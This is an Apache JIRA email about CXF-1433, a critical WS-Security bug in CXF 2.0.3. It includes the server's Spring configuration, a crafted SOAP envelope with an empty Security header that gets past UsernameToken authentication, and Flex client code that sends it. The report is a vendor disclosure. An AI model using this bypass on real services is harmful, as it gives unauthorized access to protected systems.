[
https://issues.apache.org/jira/browse/CXF-1433?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12569312#action_12569312
]
Loïc FRERING commented on CXF-1433:
-----------------------------------
Hello Fred,
Here is the Flex code that permit me to use the web service without
authentication :
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"; layout="absolute">
<mx:WebService id="helloService"
wsdl="http://localhost/webservice/HelloWorld?wsdl"; useProxy="false"
load="headers();">
<mx:operation name="sayHi">
<mx:request>
<name>Loïc</name>
</mx:request>
</mx:operation>
</mx:WebService>
<mx:Script>
<![CDATA[
import mx.rpc.soap.SOAPHeader;
//import com.adobe.crypto.WSSEUsernameToken;
private var wsseHeader:SOAPHeader;
public var fromXML;
public function headers():void {
var wsse:Namespace = new
Namespace("http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd";);
var wsseSecurity:QName = new QName(wsse.uri, "Security");
wsseHeader = new SOAPHeader(wsseSecurity, {"wsse":"Security"});
// Here would be the code to generate the WS-Security headers,
but is not....
helloService.addHeader(wsseHeader);
}
]]>
</mx:Script>
<mx:DataGrid id="dgTopPosts" width="400" verticalCenter="-66"
horizontalCenter="0" dataProvider="{helloService.sayHi.lastResult}">
<mx:columns>
<mx:DataGridColumn headerText="Hi" dataField="return" />
</mx:columns>
</mx:DataGrid>
<mx:Button label="Button" click="helloService.sayHi.send();"
verticalCenter="-125.5" horizontalCenter="0" />
</mx:Application>
> WS-Security vulnerability
> -------------------------
>
> Key: CXF-1433
> URL: https://issues.apache.org/jira/browse/CXF-1433
> Project: CXF
> Issue Type: Bug
> Components: WS-* Components
> Affects Versions: 2.0.3
> Environment: Tomcat 5.5, Spring 2 and CXF 2.0.3 for the server and
> Flex WS-client
> Reporter: Loïc FRERING
> Priority: Critical
>
> It is possible to bypass the security checks configured with WS-Security.
> Server configured with an Username Token WS-Security authentication with
> Spring :
> <jaxws:endpoint id="helloWorld" implementor="service.impl.HelloWorldImpl"
> address="/HelloWorld">
> <jaxws:inInterceptors>
> <bean
> class="org.apache.cxf.binding.soap.saaj.SAAJInInterceptor"/>
> <bean
> class="org.apache.cxf.ws.security.wss4j.WSS4JInInterceptor">
> <constructor-arg>
> <map>
> <entry key="action"
> value="UsernameToken"/>
> <entry key="passwordType"
> value="PasswordDigest"/>
> <entry
> key="passwordCallbackClass" value="service.security.ServerPasswordHandler"/>
> </map>
> </constructor-arg>
> </bean>
> <bean
> class="org.apache.cxf.interceptor.LoggingInInterceptor"/>
> <bean
> class="org.apache.cxf.interceptor.LoggingOutInterceptor"/>
> </jaxws:inInterceptors>
> </jaxws:endpoint>
> When a SOAP message is created and sent with the following header, the server
> do not process the authentication and return the response :
> <SOAP-ENV:Envelope>
> <SOAP-ENV:Header>
> <ns0:Security>
> <ns0:wsse>Security</ns0:wsse>
> </ns0:Security>
> </SOAP-ENV:Header>
> <SOAP-ENV:Body>
> <ns0:sayHi>
> <name>Loïc</name>
> </ns0:sayHi>
> </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
> So it is possible to bypass all the security checks configured and to use it.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
